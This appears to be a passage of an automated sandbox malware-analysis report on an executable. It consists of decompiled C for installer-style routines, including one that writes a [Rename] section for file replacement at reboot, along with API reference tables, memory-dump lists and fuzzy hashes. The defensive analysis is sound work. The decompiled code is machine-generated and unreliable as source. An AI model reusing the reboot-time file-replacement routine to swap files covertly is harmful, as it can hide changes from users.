                                                                                                                              0x00404898
                                                                                                                              0x00404863
                                                                                                                              0x0040477c
                                                                                                                              0x0040477f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404785
                                                                                                                              0x0040478b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404791
                                                                                                                              0x00404796
                                                                                                                              0x00404796
                                                                                                                              0x00404799
                                                                                                                              0x0040479c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004047c3
                                                                                                                              0x004047c3
                                                                                                                              0x004047c5
                                                                                                                              0x004047c7
                                                                                                                              0x004047cc
                                                                                                                              0x00000000
                                                                                                                              0x0040464d
                                                                                                                              0x0040464d
                                                                                                                              0x00404650
                                                                                                                              0x00404655
                                                                                                                              0x00404666
                                                                                                                              0x00404666
                                                                                                                              0x0040466e
                                                                                                                              0x00404671
                                                                                                                              0x00404675
                                                                                                                              0x00404678
                                                                                                                              0x0040467c
                                                                                                                              0x0040467f
                                                                                                                              0x00404682
                                                                                                                              0x00404685
                                                                                                                              0x0040468c
                                                                                                                              0x0040468e
                                                                                                                              0x0040468e
                                                                                                                              0x00404698
                                                                                                                              0x004046a5
                                                                                                                              0x004046af
                                                                                                                              0x004046b4
                                                                                                                              0x004046b7
                                                                                                                              0x004046bc
                                                                                                                              0x004046d3
                                                                                                                              0x004046da
                                                                                                                              0x004046ed
                                                                                                                              0x004046f0
                                                                                                                              0x00404704
                                                                                                                              0x0040470b
                                                                                                                              0x00404710
                                                                                                                              0x00404715
                                                                                                                              0x00404715
                                                                                                                              0x00404723
                                                                                                                              0x00404731
                                                                                                                              0x00404743
                                                                                                                              0x00404748
                                                                                                                              0x00404758
                                                                                                                              0x0040475a
                                                                                                                              0x00000000
                                                                                                                              0x00404760

                                                                                                                              APIs
                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046E7
                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
                                                                                                                              • GetSysColor.USER32(?), ref: 00404715
                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404736
                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004047B1
                                                                                                                              • SendMessageW.USER32(00000000), ref: 004047B8
                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004047E3
                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404834
                                                                                                                              • SetCursor.USER32(00000000), ref: 00404837
                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404850
                                                                                                                              • SetCursor.USER32(00000000), ref: 00404853
                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                              • String ID: Call$N
                                                                                                                              • API String ID: 3103080414-3438112850
                                                                                                                              • Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                                                                                                                              • Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
                                                                                                                              • Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                                                                                                                              • Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406160 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00406160(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a55e8 = 0x55004e;
				 *0x7a55ec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5de8
					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
						_t53 = _t52 + 0x10;
						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060BC(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040600A(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                              0x00406160
                                                                                                                              0x00406169
                                                                                                                              0x00406170
                                                                                                                              0x0040617a
                                                                                                                              0x0040618e
                                                                                                                              0x004061b6
                                                                                                                              0x004061bd
                                                                                                                              0x004061c1
                                                                                                                              0x004061c5
                                                                                                                              0x004061e5
                                                                                                                              0x004061ec
                                                                                                                              0x004061f6
                                                                                                                              0x00406203
                                                                                                                              0x00406208
                                                                                                                              0x0040620d
                                                                                                                              0x00406211
                                                                                                                              0x00406220
                                                                                                                              0x00406222
                                                                                                                              0x0040622f
                                                                                                                              0x00406233
                                                                                                                              0x004062ce
                                                                                                                              0x00000000
                                                                                                                              0x00406249
                                                                                                                              0x00406256
                                                                                                                              0x0040627a
                                                                                                                              0x0040627e
                                                                                                                              0x0040629d
                                                                                                                              0x004062a1
                                                                                                                              0x004062a1
                                                                                                                              0x004062a3
                                                                                                                              0x004062ac
                                                                                                                              0x004062b7
                                                                                                                              0x004062c2
                                                                                                                              0x004062c8
                                                                                                                              0x00000000
                                                                                                                              0x004062c8
                                                                                                                              0x00406280
                                                                                                                              0x00406283
                                                                                                                              0x0040628e
                                                                                                                              0x0040628a
                                                                                                                              0x0040628c
                                                                                                                              0x0040628d
                                                                                                                              0x0040628d
                                                                                                                              0x00406295
                                                                                                                              0x00406297
                                                                                                                              0x00000000
                                                                                                                              0x00406297
                                                                                                                              0x00406261
                                                                                                                              0x00406267
                                                                                                                              0x00000000
                                                                                                                              0x00406267
                                                                                                                              0x00406233
                                                                                                                              0x00406211
                                                                                                                              0x00406190
                                                                                                                              0x0040619b
                                                                                                                              0x004061a4
                                                                                                                              0x004061a8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061a8
                                                                                                                              0x004062d9

                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
                                                                                                                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061A4
                                                                                                                                • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                                                                                                                                • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                                                                                                                              • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 004061C1
                                                                                                                              • wsprintfA.USER32 ref: 004061DF
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
                                                                                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004062C8
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062CF
                                                                                                                                • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                                                                                                • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                              • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                                                                                              • API String ID: 2171350718-2304911260
                                                                                                                              • Opcode ID: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                                                                                                                              • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                                                                                                                              • Opcode Fuzzy Hash: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                                                                                                                              • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a70;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                              0x0040100a
                                                                                                                              0x00401039
                                                                                                                              0x00401047
                                                                                                                              0x0040104d
                                                                                                                              0x00401051
                                                                                                                              0x0040105b
                                                                                                                              0x00401061
                                                                                                                              0x00401064
                                                                                                                              0x004010f3
                                                                                                                              0x00401089
                                                                                                                              0x0040108c
                                                                                                                              0x004010a6
                                                                                                                              0x004010bd
                                                                                                                              0x004010cc
                                                                                                                              0x004010cf
                                                                                                                              0x004010d5
                                                                                                                              0x004010d9
                                                                                                                              0x004010e4
                                                                                                                              0x004010ed
                                                                                                                              0x004010ef
                                                                                                                              0x004010ef
                                                                                                                              0x00401100
                                                                                                                              0x00401105
                                                                                                                              0x0040110d
                                                                                                                              0x00401110
                                                                                                                              0x00401112
                                                                                                                              0x00401118
                                                                                                                              0x0040111f
                                                                                                                              0x00401126
                                                                                                                              0x00401130
                                                                                                                              0x00401142
                                                                                                                              0x00401156
                                                                                                                              0x00401160
                                                                                                                              0x00401165
                                                                                                                              0x00401165
                                                                                                                              0x00401110
                                                                                                                              0x0040116e
                                                                                                                              0x00000000
                                                                                                                              0x00401178
                                                                                                                              0x00401010
                                                                                                                              0x00401013
                                                                                                                              0x00401015
                                                                                                                              0x0040101f
                                                                                                                              0x0040101f
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                              • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                              • String ID: F
                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                              • Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                                                                                                                              • Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
                                                                                                                              • Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                                                                                                                              • Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00406557 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 72%
                                                                                                                              			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8a98 + _t44 * 2;
				_t45 = 0x7a6a00;
				_t108 = 0x7a6a00;
				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040651A(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a00;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E00406461(_t108,  *0x7a8a68);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067A1(_t108);
							}
							goto L38;
						}
						if( *0x7a8ae4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8a64;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063E8( *0x7a8a98, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a98 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406557(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                                                              0x00406557
                                                                                                                              0x00406557
                                                                                                                              0x00406557
                                                                                                                              0x0040655d
                                                                                                                              0x00406562
                                                                                                                              0x00406573
                                                                                                                              0x00406573
                                                                                                                              0x0040657b
                                                                                                                              0x0040657c
                                                                                                                              0x0040657d
                                                                                                                              0x0040657e
                                                                                                                              0x00406581
                                                                                                                              0x00406589
                                                                                                                              0x0040658b
                                                                                                                              0x0040659c
                                                                                                                              0x0040659f
                                                                                                                              0x0040659f
                                                                                                                              0x004065a3
                                                                                                                              0x004065a9
                                                                                                                              0x004065ac
                                                                                                                              0x00406787
                                                                                                                              0x00406787
                                                                                                                              0x00406792
                                                                                                                              0x0040679e
                                                                                                                              0x0040679e
                                                                                                                              0x00000000
                                                                                                                              0x004065b2
                                                                                                                              0x004065b7
                                                                                                                              0x004065cc
                                                                                                                              0x004065cd
                                                                                                                              0x004065d3
                                                                                                                              0x00406765
                                                                                                                              0x00406773
                                                                                                                              0x00406776
                                                                                                                              0x00406776
                                                                                                                              0x00406767
                                                                                                                              0x0040676a
                                                                                                                              0x0040676d
                                                                                                                              0x0040676f
                                                                                                                              0x0040676f
                                                                                                                              0x00406778
                                                                                                                              0x00406778
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x004065b4
                                                                                                                              0x00000000
                                                                                                                              0x004065b4
                                                                                                                              0x00000000
                                                                                                                              0x00406781
                                                                                                                              0x004065d9
                                                                                                                              0x004065dc
                                                                                                                              0x004065eb
                                                                                                                              0x004065f2
                                                                                                                              0x004065fe
                                                                                                                              0x00406601
                                                                                                                              0x00406604
                                                                                                                              0x00406605
                                                                                                                              0x0040660a
                                                                                                                              0x00406610
                                                                                                                              0x00406613
                                                                                                                              0x00406616
                                                                                                                              0x00406709
                                                                                                                              0x0040670e
                                                                                                                              0x00406741
                                                                                                                              0x00406746
                                                                                                                              0x0040674b
                                                                                                                              0x00406750
                                                                                                                              0x00406750
                                                                                                                              0x00406755
                                                                                                                              0x0040675b
                                                                                                                              0x0040675e
                                                                                                                              0x00000000
                                                                                                                              0x0040675e
                                                                                                                              0x00406710
                                                                                                                              0x00406713
                                                                                                                              0x00406716
                                                                                                                              0x0040672b
                                                                                                                              0x00406732
                                                                                                                              0x00406718
